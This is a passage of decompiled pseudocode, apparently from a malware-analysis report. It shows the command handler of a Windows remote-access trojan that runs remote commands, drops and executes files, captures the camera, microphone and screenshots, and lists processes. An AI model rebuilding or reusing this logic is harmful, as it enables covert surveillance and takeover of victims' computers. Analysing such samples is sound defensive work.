                                          																																							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x32, 1);
                                          																																							__imp__??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t485);
                                          																																							__imp__?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          																																							__eflags = _t485;
                                          																																							if(__eflags != 0) {
                                          																																								_t486 = E00401289( &_v20, __eflags, 2);
                                          																																								__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          																																								_t487 = E00401289( &_v20, __eflags, 2);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t486);
                                          																																								__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z(_t487);
                                          																																								__imp__?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																																								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																								E00406D29( &_v52);
                                          																																							}
                                          																																							__imp__??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																																							goto L112;
                                          																																						} else {
                                          																																							goto L107;
                                          																																						}
                                          																																						while(1) {
                                          																																							L107:
                                          																																							__eflags =  *0x415a70;
                                          																																							if(__eflags == 0) {
                                          																																								break;
                                          																																							}
                                          																																							Sleep(0x64);
                                          																																						}
                                          																																						_t492 = getenv("AppData");
                                          																																						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t492,  &_a7, 0x4108cc, E00401289( &_v20, __eflags, 2));
                                          																																						_t493 =  &_v72;
                                          																																						L0040FC20();
                                          																																						_t494 =  &_v52;
                                          																																						L0040FC14();
                                          																																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t494, _t493, _t493, _t492);
                                          																																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, 0);
                                          																																						_t495 = E00401289( &_v20, __eflags, 1);
                                          																																						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t494);
                                          																																						_push(_t495);
                                          																																						_push(0);
                                          																																						L0040FF56();
                                          																																						__eflags = _t495;
                                          																																						if(_t495 == 0) {
                                          																																							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																							E00406D29( &_v52);
                                          																																						}
                                          																																						goto L112;
                                          																																					} else {
                                          																																						while(1) {
                                          																																							__eflags =  *0x415a70;
                                          																																							if( *0x415a70 == 0) {
                                          																																								break;
                                          																																							}
                                          																																							Sleep(0x64);
                                          																																						}
                                          																																						E00406988();
                                          																																						L165:
                                          																																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																						goto L166;
                                          																																					}
                                          																																				}
                                          																																				_t499 = E00401289( &_v20, _t1153, 1);
                                          																																				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																				DeleteFileA(_t499);
                                          																																				goto L165;
                                          																																			}
                                          																																			 *0x415a70 = 1;
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 5));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 4));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 3));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 2));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																																			E004086B1();
                                          																																			_t1091 = _t1091 - 0xffffffffffffffd0 + 0x50;
                                          																																			L97:
                                          																																			 *0x415a70 =  *0x415a70 & 0x00000000;
                                          																																			__eflags =  *0x415a70;
                                          																																			goto L98;
                                          																																		}
                                          																																		 *0x4151b8 = 1;
                                          																																		waveInStop( *0x415158);
                                          																																		waveInClose( *0x415158);
                                          																																		goto L98;
                                          																																	}
                                          																																	 *0x4151b8 =  *0x4151b8 & 0x00000000;
                                          																																	_t509 = E00401289( &_v20, __eflags, 3);
                                          																																	__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																	_t510 = atoi(_t509);
                                          																																	_t511 = E00401289( &_v20, __eflags, 2);
                                          																																	__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																	_t512 = atoi(_t511);
                                          																																	_t513 = E00401289( &_v20, __eflags, 1);
                                          																																	__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																	E004013C9(__fp0, atoi(_t513), _t512, _t510);
                                          																																	_t1091 = _t1091 + 0xc;
                                          																																	goto L98;
                                          																																}
                                          																																_t351 =  *0x415248();
                                          																																_t879 = 0x415200;
                                          																																L53:
                                          																																E004021C7(_t351, _t879);
                                          																																goto L98;
                                          																															}
                                          																															_t517 = E00401289( &_v20, __eflags, 1);
                                          																															__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                          																															E00402109(0x415200);
                                          																															_t1113 = _t1091 - 0x10;
                                          																															asm("movsd");
                                          																															asm("movsd");
                                          																															asm("movsd");
                                          																															asm("movsd");
                                          																															E00402168(0x415200, _t517);
                                          																															__eflags =  *0x415240;
                                          																															if( *0x415240 == 0) {
                                          																																_t520 =  &_v72;
                                          																																_push(0x4151f0);
                                          																																_push(0x415268);
                                          																																_push("getcamlib");
                                          																																_push(_t520);
                                          																																L0040FC1A();
                                          																																_push(_t520);
                                          																																L0040FC14();
                                          																																_t1091 = _t1113 - 0x10 + 0x18;
                                          																																E00402198(0x415200, _t1113 - 0x10);
                                          																															} else {
                                          																																_t523 =  &_v72;
                                          																																_push(0x4151f0);
                                          																																_push(0x415268);
                                          																																_push("initcamcap");
                                          																																_push(_t523);
                                          																																L0040FC1A();
                                          																																_push(_t523);
                                          																																L0040FC14();
                                          																																_t1091 = _t1113 - 0x10 + 0x18;
                                          																																E00402198(0x415200, _t1113 - 0x10);
                                          																															}
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															E0040221C(0x415200, E00401CBE, 0);
                                          																															L23:
                                          																															goto L98;
                                          																														}
                                          																														_t526 =  &_v72;
                                          																														L0040FC20();
                                          																														_t527 =  &_v120;
                                          																														L0040FC14();
                                          																														_t1091 = _t1091 + 0x18;
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t527, _t526, _t526, 0x415b08, 0x4108cc, E00401289( &_v20, __eflags, 2));
                                          																														__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x24, 1);
                                          																														__imp__??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t527);
                                          																														__imp__?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          																														__eflags = _t527;
                                          																														if(__eflags != 0) {
                                          																															__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a7);
                                          																															_t529 =  &_v80;
                                          																															__imp__?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ(_t529);
                                          																															_t898 = 6;
                                          																															memcpy( &_v176, _t529, _t898 << 2);
                                          																															_t1119 = _t1091 + 0xc;
                                          																															_t531 = E00405288( &_v176);
                                          																															L0040FCCC();
                                          																															_t1063 = _t531;
                                          																															__imp__?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z(0, 0, _t531);
                                          																															__imp__?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z(_t1063, E00405288( &_v176));
                                          																															__imp__?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																															_t533 = E00401289(0x415940, __eflags, 0x1b);
                                          																															__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																															__eflags =  *_t533 - 1;
                                          																															if( *_t533 != 1) {
                                          																																_t535 = E00405288( &_v176);
                                          																																__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t1063, _t535,  &_a7);
                                          																																__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t535);
                                          																															} else {
                                          																																__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          																																__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																E004028EB( &_v1756, _t533, _t533);
                                          																																__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00402A2A( &_v1756,  &_v72, _t1063, E00405288( &_v176)));
                                          																															}
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															E0040FC2C(_t535, _t1063);
                                          																															_t1120 = _t1119 - 0x10;
                                          																															_t541 =  &_v192;
                                          																															L0040FC1A();
                                          																															_t542 =  &_v208;
                                          																															L0040FC14();
                                          																															_t543 =  &_v224;
                                          																															L0040FC14();
                                          																															_t544 =  &_v152;
                                          																															L0040FC14();
                                          																															_t545 =  &_v136;
                                          																															L0040FC14();
                                          																															L0040FC14();
                                          																															L0040FC14();
                                          																															L0040FC14();
                                          																															E004025EF( &_v72, _t1120,  &_v72,  &_v72,  &_v104,  &_v104);
                                          																															_t1091 = _t1120 + 0x74;
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t545, _t545, _t544, _t544, _t543, _t543, _t542, _t542, _t541, _t541, "screenshotdata", 0x415268, E00401289( &_v20, __eflags, 2), 0x415268, E00401289( &_v20, __eflags, 1), 0x415268, E00401289( &_v20, __eflags, 3), 0x415268,  &_v52, 1);
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														}
                                          																														__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																														L15:
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														goto L98;
                                          																													}
                                          																													L0040FC20();
                                          																													_t1129 = _t1091 + 0xc;
                                          																													__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ( &_v120, 0x415b08, "\\*");
                                          																													_v84 = FindFirstFileA( &_v720,  &_v720);
                                          																													__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a7);
                                          																													_t557 =  &(_v720.cFileName);
                                          																													__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t557,  &_v53, 0x4108d8);
                                          																													__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t557);
                                          																													_a7 = _t557;
                                          																													__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																													__eflags = _a7;
                                          																													if(_a7 == 0) {
                                          																														while(1) {
                                          																															__eflags = FindNextFileA(_v84,  &_v720);
                                          																															if(__eflags == 0) {
                                          																																break;
                                          																															}
                                          																															_t565 =  &(_v720.cFileName);
                                          																															__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t565,  &_v53, "..");
                                          																															__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t565);
                                          																															_a7 = _t565;
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__eflags = _a7;
                                          																															if(_a7 == 0) {
                                          																																continue;
                                          																															}
                                          																															_t567 =  &_v720;
                                          																															__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t567, 0x140,  &_v85);
                                          																															__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t567);
                                          																															L72:
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														}
                                          																														_t1130 = _t1129 - 0x10;
                                          																														_t561 =  &_v72;
                                          																														_a4 = _t1130;
                                          																														L0040FC1A();
                                          																														L0040FC14();
                                          																														_t1091 = _t1130 + 0x18;
                                          																														E00402198(0x415a30, _a4);
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t561, _t561, "scrslist", 0x415268,  &_v52);
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														goto L15;
                                          																													}
                                          																													_t569 =  &_v720;
                                          																													__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t569, 0x140,  &_a7);
                                          																													__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t569);
                                          																													goto L72;
                                          																												}
                                          																												__eflags =  *0x41576a;
                                          																												if(__eflags != 0) {
                                          																													goto L98;
                                          																												}
                                          																												E00405F6C(0, 0);
                                          																												L26:
                                          																												goto L98;
                                          																											}
                                          																											E0040520C(_t363, 0x4156c0);
                                          																											goto L98;
                                          																										}
                                          																										 *0x415a70 = 1;
                                          																										__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																										_push(1);
                                          																										E00403D9A(0x4156c0);
                                          																										goto L97;
                                          																									}
                                          																									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																									_push(0);
                                          																									E00403D9A(0x4156c0);
                                          																									goto L98;
                                          																								}
                                          																								E00404336(0x4156c0);
                                          																								goto L98;
                                          																							}
                                          																							E0040425F(0x4156c0);
                                          																							goto L98;
                                          																						}
                                          																						_v48 = _v48 & 0x00000000;
                                          																						asm("stosd");
                                          																						asm("stosd");
                                          																						GetKeyboardLayoutNameA( &_v48);
                                          																						_t1132 = _t1091 - 0x10;
                                          																						_push( &_v48);
                                          																						_push(0x415268);
                                          																						_push( &_v36);
                                          																						_t583 =  &_v72;
                                          																						_push(_t583);
                                          																						L0040FC14();
                                          																						_push(_t583);
                                          																						L0040FC20();
                                          																						_t1091 = _t1091 - 0x10 + 0x18;
                                          																						E00402198(0x415a30, _t1132);
                                          																						L22:
                                          																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																						goto L23;
                                          																					}
                                          																					_t879 = 0x415ac0;
                                          																					goto L53;
                                          																				}
                                          																				_push(1);
                                          																				L50:
                                          																				_t585 = E00401289( &_v20, __eflags);
                                          																				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																				E0040DA55(_t1044, atoi(_t585));
                                          																				goto L26;
                                          																			}
                                          																			__eflags =  *0x415ac0;
                                          																			if(__eflags != 0) {
                                          																				E004021C7(_t347, 0x415ac0);
                                          																			}
                                          																			__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																			_push(2);
                                          																			goto L50;
                                          																		}
                                          																		_t590 = E00401289( &_v20, __eflags, 1);
                                          																		__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																		ShellExecuteA(0, "open", _t590, 0, 0, 1);
                                          																		goto L98;
                                          																	}
                                          																	_t592 = E00401289( &_v20, __eflags, 1);
                                          																	_t1134 = _t1091 - 0x10;
                                          																	__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																	E0040E8B9(_t1134, __eflags,  &_v52, _t592);
                                          																	_t596 =  &_v72;
                                          																	_a4 = _t1134;
                                          																	L0040FC1A();
                                          																	L0040FC14();
                                          																	_t1091 = _t1134 + 0x18;
                                          																	E00402198(0x415a30, _a4);
                                          																	__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t596, _t596, "cmdoutput", 0x415268,  &_v52);
                                          																	goto L15;
                                          																}
                                          																_t599 = E00401289( &_v20, __eflags, 1);
                                          																__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																WinExec(_t599, 5);
                                          																goto L98;
                                          															}
                                          															_t602 = E00401289( &_v20, __eflags, 1);
                                          															__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          															GetWindowThreadProcessId(atoi(_t602),  &_a4);
                                          															E0040ECDD(_a4);
                                          															goto L28;
                                          														}
                                          														_push(9);
                                          														L33:
                                          														_t607 = E00401289( &_v20, __eflags, 1);
                                          														__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          														ShowWindow(atoi(_t607), ??);
                                          														goto L98;
                                          													}
                                          													_push(3);
                                          													goto L33;
                                          												}
                                          												_t610 = E00401289( &_v20, __eflags, 1);
                                          												__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          												CloseWindow(atoi(_t610));
                                          												goto L98;
                                          											}
                                          											L28:
                                          											E0040C9DD();
                                          											goto L98;
                                          										}
                                          										_t613 = E00401289( &_v20, __eflags, 1);
                                          										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          										E0040ECDD(atoi(_t613));
                                          										goto L26;
                                          									}
                                          									__imp___itoa(GetCurrentProcessId(),  &_a4, 0xa);
                                          									_t621 =  &_v136;
                                          									L0040FC1A();
                                          									_t622 =  &_v104;
                                          									L0040FC14();
                                          									_t623 =  &_v72;
                                          									L0040FC14();
                                          									L0040FC20();
                                          									_t1091 = _t1091 + 0x30;
                                          									E00402198(0x415a30, _t1091);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t623, _t623, _t622, _t622, _t621, _t621, "proclist", 0x415268, E004081B7(__eflags,  &_v152), 0x415268,  &_a4, _t687);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									goto L22;
                                          								}
                                          								_t625 = E00401289( &_v20, __eflags, 1);
                                          								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								_t627 = E0040712F();
                                          								_t1091 = _t1091 + 0xc;
                                          								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x32, 1,  &_v52, 0x30, _t625);
                                          								__imp__??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t627);
                                          								__imp__?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          								__eflags = _t627;
                                          								if(__eflags != 0) {
                                          									_t628 = E00401289( &_v20, __eflags, 2);
                                          									__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          									_t629 = E00401289( &_v20, __eflags, 2);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t628);
                                          									__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z(_t629);
                                          									__imp__?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          									__eflags = 0;
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									ShellExecuteA(0, "open", _t629, 0, 0, 1);
                                          								}
                                          								__imp__??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          								goto L15;
                                          							}
                                          							_t631 = E00401289( &_v20, __eflags, 2);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							_t633 = E0040712F();
                                          							_t1091 = _t1091 + 0xc;
                                          							__eflags = 0;
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, 0,  &_v52, 0x30, _t631);
                                          							_t634 = E00401289( &_v20, 0, 1);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t633);
                                          							L0040FF56();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, _t634);
                                          							ShellExecuteA(0, "open", _t634, 0, 0, 1);
                                          							goto L15;
                                          						}
                                          						_t636 = E00401289( &_v20, __eflags, 1);
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          						E0040BEA2(_t1044, __eflags, _t636);
                                          						_t1091 = _t1091 - 0x10 + 0x10;
                                          						goto L98;
                                          					}
                                          					_push(0);
                                          					_t1020 = 0x415a30;
                                          					L8:
                                          					E00402791(_t1020);
                                          					goto L98;
                                          				}
                                          				_t641 = E0040ED35();
                                          				_t650 =  &_v224;
                                          				L0040FC1A();
                                          				_t651 =  &_v208;
                                          				L0040FC14();
                                          				_t652 =  &_v192;
                                          				L0040FC14();
                                          				_t653 =  &_v168;
                                          				L0040FC14();
                                          				_t654 =  &_v256;
                                          				L0040FC14();
                                          				_t655 =  &_v52;
                                          				L0040FC14();
                                          				_t656 =  &_v120;
                                          				L0040FC14();
                                          				L0040FC14();
                                          				_t1091 = _t1091 + 0x6c;
                                          				E00402198(0x415a30, _t1091);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t656, _t656, _t655, _t655, _t654, _t654, _t653, _t653, _t652, _t652, _t651, _t651, _t650, _t650, "pong", 0x415268, E00401289( &_v20, _t1150, 1), 0x415268, E0040EDD3( &_v152, E0040E85D( &_v136)), 0x415268, E0040ED35(),  &_v104, E0040E898(_t677), 0x415268, _t641, _t677, _t677,  &_v72, GetTickCount());
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_t658 = E00401289( &_v20, _t1150, 2);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t659 = atoi(_t658);
                                          				if(_t659 <= 0) {
                                          					__eflags =  *_t666(E00401289( &_v20, __eflags, 1), "0");
                                          					if(__eflags == 0) {
                                          						goto L98;
                                          					}
                                          					_push(0);
                                          					_t1020 = 0x415a30;
                                          					goto L8;
                                          				}
                                          				_a4 = _t659 + _t659;
                                          				_t663 = E004022E6(0x415a30);
                                          				_push(_a4);
                                          				if(_t663 == 0) {
                                          					E00402646(0x415a30);
                                          				} else {
                                          					E004026F2(0x415a30);
                                          				}
                                          				goto L98;
                                          			}



































































































































































                                          0x0040a71e
                                          0x0040a729
                                          0x0040a733
                                          0x0040a737
                                          0x0040a740
                                          0x0040a749
                                          0x0040a75a
                                          0x0040a766
                                          0x0040a76f
                                          0x0040a770
                                          0x0040a775
                                          0x0040a77b
                                          0x0040a780
                                          0x0040a782
                                          0x0040bc7e
                                          0x0040bc81
                                          0x0040bc8c
                                          0x0040bc98
                                          0x0040bc98
                                          0x0040a796
                                          0x0040a79c
                                          0x0040a7ab
                                          0x0040a7b4
                                          0x0040a7b6
                                          0x0040a7b7
                                          0x0040a988
                                          0x0040a98b
                                          0x0040a98e
                                          0x0040a9a5
                                          0x0040a9a8
                                          0x0040a9d9
                                          0x0040a9dc
                                          0x0040aa5a
                                          0x0040aa5d
                                          0x0040ab28
                                          0x0040ab2a
                                          0x0040ab2b
                                          0x0040abde
                                          0x0040abe1
                                          0x0040ac11
                                          0x0040ac14
                                          0x0040ac2c
                                          0x0040ac2f
                                          0x0040ac5f
                                          0x0040ac62
                                          0x0040ac94
                                          0x0040ac97
                                          0x0040aca9
                                          0x0040acac
                                          0x0040ace9
                                          0x0040acec
                                          0x0040ad1a
                                          0x0040ad1d
                                          0x0040ad8e
                                          0x0040ad91
                                          0x0040adc6
                                          0x0040adc9
                                          0x0040adcc
                                          0x0040ae07
                                          0x0040ae0a
                                          0x0040ae35
                                          0x0040ae38
                                          0x0040ae3b
                                          0x0040ae58
                                          0x0040ae5b
                                          0x0040aeb1
                                          0x0040aeb4
                                          0x0040aeb7
                                          0x0040aed1
                                          0x0040aed4
                                          0x0040aed7
                                          0x0040aef4
                                          0x0040aef7
                                          0x0040af2c
                                          0x0040af2f
                                          0x0040af68
                                          0x0040af6b
                                          0x0040af6e
                                          0x0040af88
                                          0x0040af8b
                                          0x0040af8e
                                          0x0040afb4
                                          0x0040afb7
                                          0x0040afba
                                          0x0040b128
                                          0x0040b12b
                                          0x0040b3d5
                                          0x0040b3d8
                                          0x0040b4b4
                                          0x0040b4b7
                                          0x0040b4ba
                                          0x0040b4d8
                                          0x0040b4db
                                          0x0040b542
                                          0x0040b545
                                          0x0040b577
                                          0x0040b57a
                                          0x0040b604
                                          0x0040b60d
                                          0x0040b610
                                          0x0040b613
                                          0x0040b63c
                                          0x0040b63f
                                          0x0040b642
                                          0x0040b646
                                          0x0040b646
                                          0x0040b655
                                          0x0040b658
                                          0x0040b65b
                                          0x0040b683
                                          0x0040b686
                                          0x0040b689
                                          0x0040b751
                                          0x0040b754
                                          0x0040b757
                                          0x0040b865
                                          0x0040b868
                                          0x0040b8c5
                                          0x0040b8c8
                                          0x0040b8f8
                                          0x0040b8fb
                                          0x0040b958
                                          0x0040b95b
                                          0x0040b95e
                                          0x0040ba31
                                          0x0040ba34
                                          0x0040ba37
                                          0x0040bb08
                                          0x0040bb0a
                                          0x0040bb10
                                          0x0040bb12
                                          0x00000000
                                          0x00000000
